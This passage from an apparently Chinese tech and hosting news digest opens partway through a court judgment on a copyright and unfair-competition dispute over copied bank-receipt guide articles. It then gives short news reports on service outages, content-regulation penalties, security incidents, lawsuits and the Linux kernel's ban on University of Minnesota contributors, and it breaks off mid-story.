让用户产生混淆,不属于不正当竞争行为,原告的诉讼请求缺乏事实和法律依据。1、原告主张两被告构成《中华人民共和国反不正当竞争法》第六条第(三)款“擅自使用他人有一定影响的域名主体部分、网站名称、网页等”缺乏依据。首先,第六条第(三)款中所保护的客体为域名主体部分、网站名称与网页,原告被侵权的作品并非上述客体。其次,第六条第(三)款保护的是具有一定影响力的客体,原告并未对涉案作品的影响力进行举证,也未对其公司自身的影响力进行举证。并且,原告在诉状中称其为第一家为中小企业提供“智能记账”服务的企业,但实际上,早在2015年就有云账房网络科技有限公司、北京公瑾科技有限公司、北京令才科技有限公司以及深圳金蝶账无忧网络科技有限公司等企业提供“智能记账”服务。同时,根据公开渠道查询到的信息,从软件下载量以及微博关注数看,原告并非在“智能记账”领域具有较高影响力的公司。最后,第六条的主文部分为“经营者不得实施下列混淆行为,引人误认为是他人商品或者与他人存在特定联系”。原告并未对被告知域互联公司的作品可能引人误认为双方商品或双方存在特定联系进行举证。原告对其作品的影响力以及是否会导致相关公众产生混淆均未举证,缺乏事实依据。2、涉案文章虽然有构图、排版和结构的近似,但是,相似部分为行业通用设计,在行业内不存在独创性及排他性。文章的文字内容虽有部分相似,均因为两文章是以指引用户导出特定银行回单为目的而产生的共同特点,不会造成消费者对市场主体和服务来源的混淆。并且,要进入到涉案文章页面均需要从各自网站或小程序点击才可浏览,用户在进入时就明确知道提供服务的主体是谁,并不会导致一般公众产生混淆,两被告的行为不构成不正当竞争。3、反不正当竞争法所规制的行为是指无论正当经营者使用何种正当的竞争手段,都无法摆脱此种行为的妨碍与负面影响,无法避免此种行为对其本应获得竞争优势的破坏,无法获得与其投入相适应的回报。被告阿里云公司虽提供“智能记账”服务稍晚于原告,但被告阿里云公司早在2009年就开始提供“智能服务”,提供的智能商品或服务数量多达20000余项,“智能记账”服务仅为其中一项。提供涉案文章与被告阿里云公司主营业务无关。并且涉诉的获取电子回单服务并非享受智能记账的必然步骤,两被告发布涉案被诉侵权作品仅为方便其用户了解银行操作流程,是为了社会公共利益之目的。两被告的行为并不会给原告带来妨碍和负面影响,更不会破坏原告的竞争优势,或让两被告据此获得不正当竞争优势。4、关于原告诉称被告知域互联公司的“智能财税小程序”应用界面也与原告自记账应用APP界面设计、编排相近似,足以让相关受众混淆,被告存在引起相关公众混淆误认的故意,构成不正当竞争行为。首先,“智能财税”小程序系被告知域互联公司自主研发和设计,不存在侵犯他人权益的事实。而且,原告并未对“智能财税”小程序与原告app界面构成实质性相似进行举证。其次,原告主张该小程序界面设计侵权与原告在本案主张的文章作品著作权侵权及不正当竞争行为无关,不属于本案审理范围,应当另行立案主张,本案应当依法驳回原告该部分起诉。三、原告请求两被告删除其侵权页面及链接的事实已不存在。在本案起诉之前,两被告并未收到过原告的侵权投诉通知,且在收到本案诉讼材料后,为避免争议,第一时间删除了相关涉案文章。原告要求两被告删除侵权页面及链接的事实已不存在,应予驳回。四、原告请求的赔偿金额过高,要求被告知域互联公司删除涉案小程序缺乏事实和法律依据。1、根据“谁主张谁举证”原则,原告要求两被告承担其经济损失10万元,但原告并未对该经济损失进行举证。2、根据《中华人民共和国著作权法》第四十九条规定,赔偿额以实际损失为准,实际损失难以计算的,按照侵权人的违法所得给予赔偿。违法所得与实际损失都不能确定的,由人民法院根据侵权行为情节进行认定。根据《最高人民法院关于审理著作权民事纠纷案件适用法律若干问题的解释》第二十五条规定,人民法院在确定赔偿数额时,应当考虑作品类型、合理使用费、侵权行为性质、后果等情节综合确定。原告的作品构成简单,独创性极低,影响力不大,并且,两被告发布涉案被诉侵权作品的目的是为方便用户,为了社会公共利益而非盈利,且浏览量极低,对原告的影响几乎可以忽略不计。因此,原告在没有对其损失进行举证的情况下,主张10万元经济损失的赔偿要求过高。3、即便法院最终判定被告知域互联公司侵犯原告权利,根据《中华人民共和国著作权法》第四十七条规定,被告知域互联公司需根据情况,承担停止侵害、消除影响、赔礼道歉、赔偿损失等民事责任。停止侵害指的应是删除涉案文章或断开链接等行为。原告要求被告知域互联公司删除涉案小程序缺乏法律依据。综上所述,原告的诉讼请求没有事实和法律依据,依法应驳回其全部诉讼请求。法院裁决: 本案是著作权侵权及不正当竞争纠纷。根据诉辩双方的意见,本案争议的焦点为:一、原告主张权利的涉案文章是否属于著作权法保护的作品;二、两被告的行为是否构成著作权侵权;三、两被告的行为是否构成不正当竞争;四、如两被告的行为构成著作权侵权及不正当竞争,相关责任如何承担。一、原告主张权利的涉案文章是否属于著作权法保护的作品《中华人民共和国著作权法实施条例》第二条规定:“著作权法所称作品,是指文学、艺术和科学领域内具有独创性并能以某种有形形式复制的智力成果。”据此,作品须为人类的智力成果,须是可被客观感知的外在表达,须是文学、艺术或科学领域内的成果,须具有独创性,上述因素缺一不可。在认定一种劳动成果是否构成著作权法意义上的作品时,不能仅仅判断其是否为智力成果,是否为“独立完成”或“首次完成”的,以及其是否凝聚了作者的智力创造,还要根据著作权法的基本原理,将许多类型的智力成果,如思想、事实、程序、操作方法和数学公式等排除出去。具体本案而言,原告主张权利的涉案文章主要采取“图片+文字描述”形式对各银行固有的系统操作流程进行介绍,并采取方框、箭头等方式对操作方法进行梳理、细化,以达到操作程序更加清晰易懂的目的。对比两被告提交的各银行的系统页面,图片内的时间和名称均为银行后台自动形成,图片的选择和排列顺序均遵循各银行的操作流程,原告对此不存在创作行为。而原告文章的图片上的方框、箭头及文字标注是对各银行固有的系统操作流程进行客观的描述和步骤指引,属于功能性表达,原告只是用自己的语言将各银行固有的系统操作流程重新梳理和细化,以达到直观、清晰、便于操作而已,不存在任何的艺术加工,不属于著作权法意义上的作品。故,原告主张涉案的38篇文章属于作品,缺乏相应的依据,本院不予支持。二、两被告的行为是否构成著作权侵权本院认为,如前所述,原告主张权利的涉案38篇文章不属于著作权法意义上的作品,因此,原告主张两被告侵犯了其涉案38篇文章的著作权,依据不足,本院不予支持。关于“智能财税小程序”的应用界面是否侵害原告自记账应用APP著作权的问题。本院认为,经比对,“智能财税小程序”的应用界面与原告自记账应用APP的界面设计、编排等存在差异,不构成实质性相似。因此,原告指控“智能财税小程序”的应用界面侵害了其自记账应用APP著作权,依据不足,本院不予支持。三、两被告的行为是否构成不正当竞争1、关于原告主张权利的38篇文章本院认为,原告采取“图片+文字描述”形式对各银行固有的系统操作流程进行介绍,并采取方框、箭头等方式对操作方法进行梳理、细化,以达到操作程序更加清晰易懂的目的。原告作为研发面向中小企业“智能记账”的企业,通过在其“自记账”系统陆续发布涉案38篇文章的方式,以获取市场的竞争优势和交易机会。而且,原告在其“自记账”系统陆续发布涉案38篇文章后,在“智能记账工具”领域已获得了极高的关注度,为相关公众所知悉,具有一定的影响力,属于《中华人民共和国反不正当竞争法》规定的有一定影响的商品。两被告辩称原告在“智能记账”领域并非具有较高影响力,涉案38篇文章也不具有影响力,但,两被告作为有一定知名度的企业,其使用原告的涉案38篇文章的行为已经充分说明了其知道涉案38篇文章的知名度和影响力,故,本院对两被告提出的上述抗辩不予采纳。两被告的“智能记账”服务与原告提供的服务同属“智能记账工具”领域,二者服务内容、客户对象范围基本相同。两被告使用原告涉案38篇文章进行记账系统产品的宣传,主观上具有夺取原告竞争优势和市场交易机会的恶意,客观上也引起相关公众的混淆和误认,故,两被告使用原告涉案38篇文章的行为构成不正当竞争。2、关于“智能财税小程序”应用界面本院认为,如前所述,“智能财税小程序”的应用界面与原告自记账应用APP的界面设计、编排等存在差异,不足以引起相关公众的混淆和误认,因此,对原告提出的两被告使用“智能财税小程序”应用界面构成不正当竞争的诉请,本院不予支持。四、两被告的相关责任如何承担本院认为,如前所述,两被告使用原告涉案38篇文章的行为构成不正当竞争。但鉴于两被告在收到本案应诉材料后,已经删除了被控侵权文章和小程序,侵权行为已经实际停止。因此,原告诉请两被告停止不正当竞争行为,已无判决的必要。但,两被告仍应承担对原告的赔偿责任。关于赔偿数额。根据《中华人民共和国反不正当竞争法》第十七条第三款、第四款规定:“因不正当竞争行为受到损害的经营者的赔偿数额,按照其因被侵权所受到的实际损失确定;实际损失难以计算的,按照侵权人因侵权所获得的利益确定。经营者恶意实施侵犯商业秘密行为,情节严重的,可以在按照上述方法确定数额的一倍以上五倍以下确定赔偿数额。赔偿数额还应当包括经营者为制止侵权行为所支付的合理开支。经营者违反本法第六条、第九条规定,权利人因被侵权所受到的实际损失、侵权人因侵权所获得的利益难以确定的,由人民法院根据侵权行为的情节判决给予权利人五百万元以下的赔偿。”本案中,鉴于原告没有举证证明因两被告侵权所受到的具体损失或两被告因侵权所获得的利益,故,本院综合考虑侵权人的经营规模、侵权人主观过错程度等因素,酌情确定两被告赔偿原告的经济损失6万元。对于合理费用,原告已经提交公证费发票、律师费发票及《民事纠纷委托代理合同》予以佐证,且原告主张的相关费用尚在合理范围内,因此,本院对原告主张的合理费用22400元予以支持。综上所述,依照《中华人民共和国反不正当竞争法》第六条、第十七条,《中华人民共和国著作权法实施条例》第二条之规定,判决如下:一、被告阿里云计算有限公司、知域互联科技有限公司于本判决生效之日起十日内赔偿原告射手科技(珠海)有限公司经济损失60000元;二、被告阿里云计算有限公司、知域互联科技有限公司于本判决生效之日起十日内赔偿原告射手科技(珠海)有限公司为维权支出的合理费用22400元;三、驳回原告射手科技(珠海)有限公司的其他诉讼请求。广东省珠海市香洲区人民法院完整版裁决文书可点击这里查看:https://wenshu.court.gov.cn/website/wenshu/181107ANFZ0BXSK4/index.html?docId=00b037363a9440b6b5edadf80028d347 #### 因人为配置失误欧洲最大的云服务商 OVH 瘫痪 OVH是欧洲最大、全球第三大的托管服务提供商,今天早些时候在计划维护期间宕机,初步原因是路由配置问题。OVH在四大洲建有32个数据中心,超过30万台服务器,全球网络容量总计20Tbit/s。它为全球130万家企业客户提供网站托管、云计算服务和专用服务器。今年早些时候,位于法国斯特拉斯堡的OVH数据中心在3月份被烧毁后,各大网站也随之瘫痪。随后关闭了斯特拉斯堡的SBG1、SBG2、SBG3和SBG4数据中心,以遏制从SBG2开始的火灾造成的损失。当时受影响的客户名单包括:视频游戏开发商Rust、免费国际象棋服务器提供商Lichess.org、电信公司AFR-IX、加密实用程序VeraCrypt、新闻媒体eeNews Europe、加密货币交易所Deribit的博客及文档网站、艺术建筑群蓬皮杜中心以及许多众多网站。该公司的创始人后来解释道,SBG2是建于2011年的老一代数据中心,OVH正竭力把旧的基础设施换成更新颖的技术。 #### 因作品涉嫌传播淫秽色情 晋江文学城被关闭停更15天 5月24日 消息:昨日,扫黄打非办发文称,北京市“扫黄打非”部门联合行动,查处晋江文学城涉嫌传播淫秽色情信息行为,关闭停更相关栏目、频道;对违法行为,执法机关将进一步追查。 北京市扫黄打非办称,根据群众举报,经查,在晋江文学城登载的网络作品中,《不知悔改的男人》《妖孽养成日记》等作品涉嫌传播淫秽色情内容。对此,相关部门依法责令其立即进行整改,配合执法机关调查,全面清查网络出版物内容,完善审核编辑制度,对存在问题立行立改。 昨日晚间,针对上述情况,晋江文学城官方微博发布声明回应称,立即关停古代纯爱频道下的东方架空栏目及衍生纯爱频道下的东方幻想栏目,停止更新原创分站15天。 以下为晋江文学城声明全文: 晋江从来不是一个回避问题的公司,16年我们一直在努力,期待在晋江这座森林里面,多一些鲜花,不要有毒草。但是,在取得成绩的同时,不可否认仍然有问题存在。对于逃过晋江审核的问题章节展示出来,我们是负有责任的。我们将主动配合执法机关依法查处,诚恳接受处罚,同时,按照行业主管部门的要求,全面开展自查,认真进行整改。从即日起,立即关停古代纯爱频道下的东方架空栏目及衍生纯爱频道下的东方幻想栏目,停止更新原创分站15天。我们将在有关部门和读者的共同帮助下认真开展自查自纠,进一步完善内控制度,把好内容审核关口,确保合法合规经营。 2019年5月23日 #### 因使用旧版 jQuery,全球至少有 7.5 亿个网站存在安全风险 11 月 6 日消息,OpenJS 基金会日前在官网声称,基于 IDC 调查结果,在全球 19 亿个网站中,近 90% 使用开源软件 jQuery,其中至少有 7.5 亿个网站正在使用旧版 jQuery,超过三分之一的受访者证实在过去 24 个月内经历了相关“安全事件”。 ▲ 图源 OpenJS 基金会 OpenJS 基金会表示: 89%的随机调查受访者报告称,他们知道自己的网站使用了 jQuery。 85%的受访者认为,自家企业拥有网站是极其重要的。 安全事件造成的业务损失严重,28%的受访者表示有客户流失,29%的受访者表示造成了收入损失。此外 45% 的受访者报告了因安全事件导致了自家品牌受损。 48% 的受访者表示,提升安全性是他们升级 jQuery 的首要动机。 OpenJS 基金会认为,企业主和开发人员有责任确保其网站安全,虽然 jQuery 使网页开发变得更为方便,但也许多网站依然沿用旧的 jQuery 版本,这些版本中或多或少存在安全漏洞,即使 jQuery 团队发布针对性的安全修复,这些网站通常也不会进行更新,从而导致一系列“安全事件”。 worbler.ai 的 jQuery Core 团队负责人兼首席前端工程师 Timmy Willison 表示,“每个人都有责任确保自己的网站安全。这并不总是一项简单的任务,但确保软件包是最新的可能是一个很好的开始,jQuery 团队很高兴与 OpenJS 基金会合作,作为这项‘网络检查活动’的一部分,从而帮助改善一系列网站的安全状况。” OpenJS 基金会正在评估旗下 OpenJS Healthy Web 检查工具,IT之家发现,这款工具主要用于检测网站上的软件包是否过时,目前相关工具正处于测试阶段,仅限技术评估人员和 OpenJS 成员使用,计划于 2024 年初全面推出。 #### 因使用量不佳:抖音社交软件飞聊APP停止下载 微信的霸主地位牢不可破,在短视频领域如日中天的字节跳动也束手无策。上线不到2年,字节跳动旗下的飞聊APP已在绝大部分应用商店内下架,且官网也无法打开。有业内人士表示,这意味着飞聊已正式关闭全网的下载通道,距离官方的正式关停只差一个公告,或者可能连公告也不会出。 2018年底,字节跳动收购“飞聊”的英文域名“flipchat.cn”。 019年5月20日,飞聊APP正式上线,定位是一款开放性兴趣社交产品,是即时通讯软件和兴趣爱好社区的集合,致力于帮助用户发现共同爱好。 这款APP一出世就被冠以微信挑战者的名号,试图动摇微信熟人社交的王座。随后因为利用分享朋友圈的手段拉拢用户,结果上线不久就遭到微信的封杀。 2020年1月,飞聊上线PC版,支持Windows和Mac系统。从界面来看,飞聊PC版于微信PC版颇为相似,包含“消息”、“联系人”、“文件”三个功能部分,兼顾聊天和办公。 #### 因侵权方正字体版权 某公司损失2860万元险些倒闭 3月5日 消息:近日,有网友称,自己公司的实习生因使用了微软雅黑和盗版PS,接到方正集团和adobe起诉,而样稿印刷厂印了 5000 万张已经全国商用,导致公司损失2860万,裁员8个主管,42个人。 据悉,微软雅黑是由微软公司委托方正字体公司制作。微软公司只拥有微软雅黑的使用权,而版权仍属于方正,用户仅可以在Windows系统中使用微软雅黑。上述情况因脱离Windows平台,导致了侵权。 资料显示,微软雅黑是美国微软公司委托中国北大方正电子有限公司设计的一款全面支持ClearType技术的字体。每个字的造价成本在100美元左右。 现在国内版权意识越来越严重了,大家使用图片、字体、软件的时候注意了,别碰到雷区哈。 #### 因光缆断掉,美国东海岸地区遭遇大范围的互联网故障 周二,包括Verizon Communications Inc在内的多家宽带服务提供商出现大范围的互联网故障,美国东海岸地区成千上万用户因此受到影响,谷歌、亚马逊、Zoom、Slack、Spotify和其他科技公司提供的服务受到了扰乱。故障监测网站Downdetector.com也显示了众多用户报告康卡斯特(Comcast Corp)、Roblox Corp和Slack Technologies Inc.出现了故障。据Downdetector.com声称,这起故障影响了美国东北地区的多个地方,包括华盛顿特区、弗吉尼亚州、纽约州、新泽西州和马萨诸塞州。Verizon是美国一家知名的宽带服务提供商,它已向用户告知Verizon Fios在布鲁克林出现了光缆断掉的情况。发言人Rich Young表示,该公司已“意识到一个问题在影响整个东北走廊地带的宽带服务质量”。他补充道,Verizon“已经看到服务开始恢复到正常的水平。”与此同时,联邦通信委员会(FCC)正在调查反映故障的报告。联邦通信委员会代理主席Jessica Rosenworcel在Twitter上表示,这家监管机构的公共安全和国土安全局“正在竭力查明事情的真相。”AWS在其官网上表示,与其服务有关的连接问题已得到了解决。早些时候AWS表示,它正在调查一家互联网提供商出现的连接问题,这个问题导致AWS服务以及许多依赖AWS服务的在线服务受到了严重影响。谷歌的发言人表示,该公司已获悉问题在影响用户正常访问其一些产品,但还没有发现其服务存在问题。据Downdetector.com声称,两大零售交易平台嘉信理财和Robinhood上的用户也连续第二天报告市场交易期间出现了操作问题。嘉信理财的女发言人说:“今天上午早些时候,我们遇到了一个问题,银行账户结余显示不正确,该问题已得到了解决。交易功能并没有受到影响。”Robinhood表示,由于Verizon遭遇故障,其在美国东海岸地区的客户在访问互联网时可能遇到问题,不过其平台仍正常运行。 #### 因域名DNS问题,苹果发生大规模网络故障 北京时间 3 月 22 日消息,当地时间周一,苹果公司发生大范围网络故障,一些用户的 Apple Music、iCloud 和 App Store 等服务被切断,公司内部企业和零售系统也出现了短暂的网络链接错误,苹果表示是域名系统(DNS)问题。 苹果公司表示,在周一下午晚些时候发生宕机后,包括 App Store、Apple TV、Apple Music、地图在内的所有服务都已经恢复。 此次宕机导致数千名用户无法使用近 12 项苹果服务。苹果系统状态页面曾显示 11 项服务遭遇宕机,包括播客、音乐和 Arcade 游戏。页面当时显示,苹果正在调查这个问题,服务可能会很慢或不可用。 宕机跟踪网站 Downdetector.com 的数据显示,超过 4000 名用户报告了访问 Apple Music 时存在的问题,近 4000 名用户报告了访问 iCloud 的问题。 用户还标记了“查找我的 iPhone”、Apple store 零售店应用、地图和支持方面的问题。而且,苹果在家办公的职能部门员工和零售员工也遭遇了服务访问问题。此次宕机耽误了产品维修和取货,并限制了员工访问内部网站。 #### 因域名过期 多款Denuvo加密正版游戏无法运行 从昨天开始,不少玩家反馈称其游戏无法运行,涉及的作品包括但不限于《古墓丽影》、《中土世界:战争之影》《动物园之星》《僵尸围城》《足球经理》《银河护卫队》等。 很快大家发现,这些游戏有一个共同特点,那就是采用Denuvo正版DRM加密软件。 安全研究人员Alex Buckland随后表示,造成这些游戏无法运行的原因是DRM提供商的域名过期。 其中一个域名是codefusion.technology,其域名早在今年9月24日就过期了,但随后进入续费宽限期,直到宽限期也终止,DNS记录就被删除了。 找到原因后,Steam上出现了修改Windows HOSTS文件的临时解决方法,但玩家仍然非常愤怒,毕竟这是自己真金白银买的正版游戏,没想到反成受害者。 #### 因天气炎热,谷歌、甲骨文的服务器直接热崩了 北京时间 7 月 20 日消息,当地时间周二,英国经历了破纪录的高温,气温高达 40 摄氏度。谷歌云服务和甲骨文在英国的服务器遭遇了与冷却相关的宕机,两家公司都把意外关机归咎于高温。 谷歌在其谷歌云状态页面上指出,公司在英国的一个数据中心遭遇了“冷却相关故障”。“这导致该区域出现了一定程度的容量故障,使得 VM 虚拟机终止,一小部分客户失去了机器支持。”谷歌表示。该公司补充说,它还“关闭”了一些机器,以防止任何进一步的损坏。 与此同时,甲骨文也在其状态页面上为客户提供了类似的信息,但直接将英国的“非季节性气温”列为故障的原因。周二早些时候,甲骨文关闭了一些机器,以防止系统故障,但其最新更新表明,服务正在慢慢恢复上线。甲骨文表示,数据中心的温度“已经达到可工作的水平”,但仍在修复其冷却系统。 目前还不清楚这两家公司的宕机会影响到多少用户,但宕机可能会给使用甲骨文和谷歌云服务托管网站的用户带来问题。 对于英国来说,基础设施无法应对极端高温是很少见的事情,即使在夏天也是如此。除了瘫痪数据中心之外,高温还扰乱了全国各地的交通,伦敦卢顿机场的跑道融化,铁路弯曲断裂。高温还在英国多个地区引发了山火,涉及伦敦、肯特、康沃尔和彭布罗克郡。随着气候变化的影响继续波及全球,炎热的热浪可能会成为英国被迫适应的东西。 #### 因存在色情导流行为 微博遭行政处罚 1月15日 消息:据扫黄打非公众号消息,近期“扫黄打非”部门调查发现,微博平台上色情引流现象突出,长期未得到有效遏制。2020年至今,“扫黄打非”部门坚决查处打击不法人员利用微博引流传“黄”、散布不良信息的违法犯罪行为。犯罪嫌疑人通过在微博注册账号发布色情低俗内容、评论刷帖、向微博聊天群散播淫秽视频等方式进行引流,均将受到法律严惩。 扫黄打非办表示,对微博平台履行内容安全企业主体责任不到位的情况,“扫黄打非”部门曾数次约谈微博公司负责人责令整改,并给予行政处罚。全国“扫黄打非”办公室2020年7月发布“净网2020”专项行动阶段性成果时,对微博涉及问题处理情况进行了通报。 近日,根据群众举报,全国“扫黄打非”办公室再次部署北京市“扫黄打非”部门对微博中存在传播淫秽色情信息且处置不力的情况进行查处。经查,2018年12月至2020年12月期间,微博上多名注册用户发布网络出版物和长图小说,其内含有明显淫秽色情内容。今年1月4日,北京市文化市场综合执法总队依据相关法律规定,对运营微博的北京微梦创科网络技术有限公司作出行政处罚。 主机吧提醒,年尾审查都比较严,各位做网站的同学要注意审核内容了哈。 #### 因对医院不满非法入侵内网服务器进行破坏被捕 华商报消息,今年3月起,西安市莲湖区一家医院的网络系统持续出现故障,导医台、诊室、药房和病历系统等网络设备无法正常联网,医院诊疗秩序受到破坏。据医院负责人介绍,有时候是打印机连不上网,药也开不出来,有时候是CT机无法使用,还有B超机用不成……从3月中旬到5月中旬,这样的情况陆陆续续出现,直到医院的诊疗系统全面瘫痪。经医院网络工程师初步排查,医院网络系统重要文件疑似被人为更改,连病人的病历也被删除,诊疗系统全面瘫痪。5月15日,医院负责人向公安莲湖分局报警。公安莲湖分局网络安全保卫大队接到报警后,迅速联合属地红庙坡派出所成立专案组进行案件侦破,第一时间对受破坏网络系统开展电子证据数据侦查、取证工作,收集攻击日志近10万条,提取电子证据1.2TB。经过连续月余技术攻关,分析海量服务器数据后,发现多条可疑IP地址先后十余次非法登录该院计算机系统,并更改、删除、重置重要文件的记录。通过进一步侦查,最终锁定医院前系统管理员、41岁的男子白某某有重大作案嫌疑。在掌握白某某犯罪证据后,专案组抽调精干力量对其实施抓捕,当场查获作案用电脑1台、手机1部、硬盘1个及用于作案的软件1款。经审查,犯罪嫌疑人白某某系医院前网络系统管理员。其在办理离职手续时,听到院方一位领导说其岗位不重要的话,遂产生报复心理。为了证明自己的实力,白某某利用自学网络知识,非法入侵医院内网服务器,远程进行破坏性操作。办案民警说,白某某此举实际上就是一种炫技性的报复,他对医院的网络系统非常熟悉,因为他参与了早期医院诊疗系统的建设,所以知道什么是核心内容,非法入侵时有针对性地进行破坏。此案也是西安公安莲湖分局侦破的首例破坏医院计算机信息系统案。目前,犯罪嫌疑人白某某对其破坏计算机系统的犯罪事实供认不讳,白某某因涉嫌破坏计算机信息系统罪被莲湖公安依法刑事拘留,莲湖区检察院已对其批准逮捕,案件正在进一步侦查中。 #### 因恶意点击,百度起诉一网站获赔205万 10月30日 消息:据知产北京公众号消息,原告百度公司(简称百度公司)是百度网的运营主体,百度网主要为网络用户提供搜索服务。被告W有限公司(简称W公司)是“W广告任务网”网站的运营主体。 W公司通过设置广告任务发布平台帮助、指引流量需求方发布需求任务,以“盈利”为诱饵,诱导“接任务”用户伪装成正常用户制造虚假点击量,以满足“发任务”用户的需求,干扰搜索引擎算法,提升自然搜索排名。百度公司将W公司起诉至法院,主张W公司的行为违反《中华人民共和国反不正当竞争法》(简称反不正当竞争法)第八条和第二条,构成不正当竞争,请求判令W公司停止不正当竞争行为、消除影响、赔偿其经济损失及合理开支500万元。 北京市海淀区人民法院审理后认为,W公司的行为构成不正当竞争,判决W公司停止不正当竞争、消除影响、赔偿百度公司经济损失200万元及合理开支5万元。 宣判后,W公司不服,向北京知识产权法院提起上诉。 北京知识产权法院审理后认为,首先,百度公司的合法权益因被诉行为受损。被诉行为是运营针对搜索引擎进行人工制造虚假点击量的交易平台,干扰搜索引擎算法,提升满足引流需方指定网站搜索排名,以“盈利”为诱饵,诱导“接任务”用户伪装成正常用户进行搜索并产生点击,该点击量数据并非真实用户基于真实搜索需求而产生,百度公司以上述虚假点击量数据为分析数据,进而将目标网站展示在搜索结果排名靠前的位置,无法真实、客观地反映目标网站的网站质量以及与用户需求的匹配度,明显违背了百度公司的经营意愿,对百度网自然搜索结果排序造成了实质性影响,一定程度上替代了百度公司所提供的付费推广业务。长此以往,会降低用户对百度网的使用体验和使用评价。 此外,被诉行为的出现,必然使百度公司需投入更大成本,进一步升级、改进其防作弊措施,甄别、防范虚假点击量,这也将给百度公司的经营造成更大负担。综上,被诉行为损害了百度公司的合法权益。 其次,W公司的行为手段具有不正当性。W公司作为互联网领域经营者,理应知道百度搜索在市场上的知名度、制造虚假点击量数据可能对搜索结果排序产生的影响以及对目标网站的影响等,客观上仍然实施了撮合交易、帮助、诱导的行为。该行为手段明显不当,可推定W网络公司具有明显的主观恶意。 再次,被诉行为损害了消费者权益。被诉行为使原本与用户需求匹配度较低的目标网站因排名靠前而易被用户浏览,该类目标网站往往是为了通过快速提升搜索结果排名这一“捷径”而获取用户浏览量,进而获得相关收益,故网站本身含有丰富内容的可能性较低。这就使用户无法轻易获得本应呈现在排序前列的正常搜索结果,需花费更大时间成本去搜索满足其需求的网站,影响到消费者对于搜索引擎服务的正常使用,损害了消费者的合法权益。 最后,被诉行为扰乱了市场竞争秩序。W公司制造了虚假的用户需求和点击量数据,欺骗了搜索引擎的算法,未遵循搜索引擎优化行业的一般规则,并据此谋取收益,显然有悖于诚实信用原则和商业道德。从长远来看,如不对被诉行为进行规制,将使得网站经营者不再通过提升网站本身内容和质量来提升搜索引擎排名,而是通过被诉行为这种作弊手段快速实现,导致市场激励机制失灵,扰乱了正常的网络经营活动和健康有序的竞争秩序。 综上所述,W公司的行为构成不正当竞争,北京知识产权法院判决驳回上诉,维持原判。 #### 因挂黑产,长城号域名已被污染 还记得70几万卖的长城号网站吗?目前域名已被污染。 所谓污染其实是国内防火墙拦截国外非法内容的一种手段。 主机吧了解到,之所以会出现被污染的情况,主要是因为长城号被卖号,这位大佬拿去做黑产了。 最新收录的内容都是一些黑产信息,其实以这么高的价格买这样的一个站,主机吧就有预感,买家肯定不是正经运营长城号的,因为如果想靠这个站的流量赚广告费的话,挂个五六年都拿不回成本,那就只能做黑产了。黑产来钱快,只要半年没挂,几十万拿回来轻轻松松。 目前来看,已经半年了,估计这位大佬钱是赚回来了,估计还有盈利。不过这种站风险极高,一但被抓那不得吃免费牢饭了,站长们千万别学。 #### 因故意插入实验性漏洞 开发者被禁止向Linux内核供应代码 Greg Kroah-Hartman禁止美国一所大学尝试主线Linux内核补丁,因为它故意提交有安全影响的可疑代码和其他以研究为名的"实验"。源于一篇研究论文,明尼苏达大学的研究人员故意在Linux内核主线中隐秘地引入漏洞。他们为了研究论文,故意在内核中隐蔽地引入用户之后的漏洞。 但即使在这篇论文之后,明尼苏达大学的研究人员又有了新一轮的补丁,他们声称这来自"一个新的静态分析器",但没有任何真正的价值。这些新的、有问题的补丁实际上似乎没有任何真正的价值,至少只是在浪费上游开发者的时间。内核维护者Greg揭露了这一伎俩,并禁止这些开发者在未来尝试为Linux内核做贡献。 Greg今天早上在内核邮件列表中写道:"[这些新的补丁]显然不是由一个有智慧的静态分析工具创造的,因为它们都是完全不同的模式的结果,而且所有这些补丁显然根本没有修复任何东西。那么,除了你和你的团队继续通过发送这种无稽之谈的补丁来对内核社区的开发者进行试验之外,我还能想到什么呢?......任何对C语言有一定了解的人都可以看到你提交的补丁根本没有任何作用,所以认为一个工具创造了它们,然后你认为它们是一个有效的 "修复",这完全是你的疏忽,不是我们的。你才是有错的人,我们的工作不是成为你创造的工具的测试对象......因为这个,我现在不得不禁止你的大学今后的所有贡献,并撤销以前的贡献,因为这显然是以恶意的方式提交的,本身是为了造成问题。 因此,内核维护团队不再欢迎来自明尼苏达大学的贡献者对上游的Linux内核开发提交变动,而明尼苏达大学之前对Linux内核的补丁将被恢复。 #### 因服务器宕机 亚马逊等全球多个网站目前无法访问 6月8日 消息:今天傍晚,全球多个网站因服务器宕机,目前无法访问,在这些宕机的网站中包括亚马逊、Reddit、eBay等。与此同时《纽约时报》、英国《卫报》等多家媒体的网站也无法访问。 去年以来全球范围也出现过多次的服务器宕机事故,包括微软、谷歌等大公司也因为服务器宕机导致部分网站无法访问的情况。 《英国》卫报在官方推特账号上发文表示,目前其网站和App正受到更广泛的互联网中断影响,并将尽快恢复。 #### 因机房故障,网易游戏集体崩溃 最近国内因机房故障的出现问题的业务很多,11月2号字节跳动旗下抖音和飞书因机房出问题无法访问,11月3日晚间,不少玩家反馈网易旗下众多游戏出现无法登陆等异常现象,随后网易多个游戏官微确认该消息,并在当晚陆续恢复正常。 本次出现异常的游戏包括《阴阳师》、《漫威对决》、《哈利波特手游》、《永劫无间》、《光遇手游》等,几乎涵盖网易旗下众多热门游戏几乎都出现问题。 网易游戏官方回应称“关于网易旗下部分游戏出现不能登录的情况,我们已第一时间对相关问题展开修复,目前各产品正陆续恢复登录。对给各位玩家朋友带来的不便,我们深表歉意,感谢大家的理解和耐心等待。” 在网易旗下游戏陆续恢复正常后,网易运营方也向玩家发放了补偿奖励,由于补偿的力度较高,也让不少玩家十分满意。 #### 因流量劫持 11 被抓:涉及电信运营商、IDC 代理等 来源:检察日报·明镜周刊作者:曹颖频 李敏 曾啟秀 赵晓颖编辑:马菲菲 吴鹏瑶 张苏茜 日前,四川省绵竹市检察院办理了非法控制计算机信息系统系列案,及时斩断伸向网民的流量黑手,破获流量劫持违法犯罪团伙 3 个,抓捕犯罪嫌疑人 11 人,已成功追回涉案虚拟货币等违法所得 1200 余万元,有效净化了网络空间。 2022 年 6 月,绵竹市公安机关在办理一起网络赌博案时,发现参赌人员频繁提到一个叫张某的人。 此人无正当职业,但出手阔绰,还邀请参赌人员乘坐头等舱赴新疆、海南三亚等地旅游,多次为参赌人员娱乐场所高消费买单等,张某的异常行为引起了办案民警的注意。公安机关以涉嫌开设赌场罪依法传唤张某。面对讯问,张某辩称自己并未开设赌场,也未曾为他人赌博提供条件。但当民警深究其资金来源及手机中为何存有大量赌博网站信息时,张某自知无法掩饰,经其交代,一起非法控制计算机信息系统系列案浮出了水面。仅有中专文凭的张某无一技之长,一直无所事事、混迹社会。2013 年,张某因犯非法拘禁罪被判处有期徒刑一年十个月,刑满释放后去往菲律宾一家赌场打工。 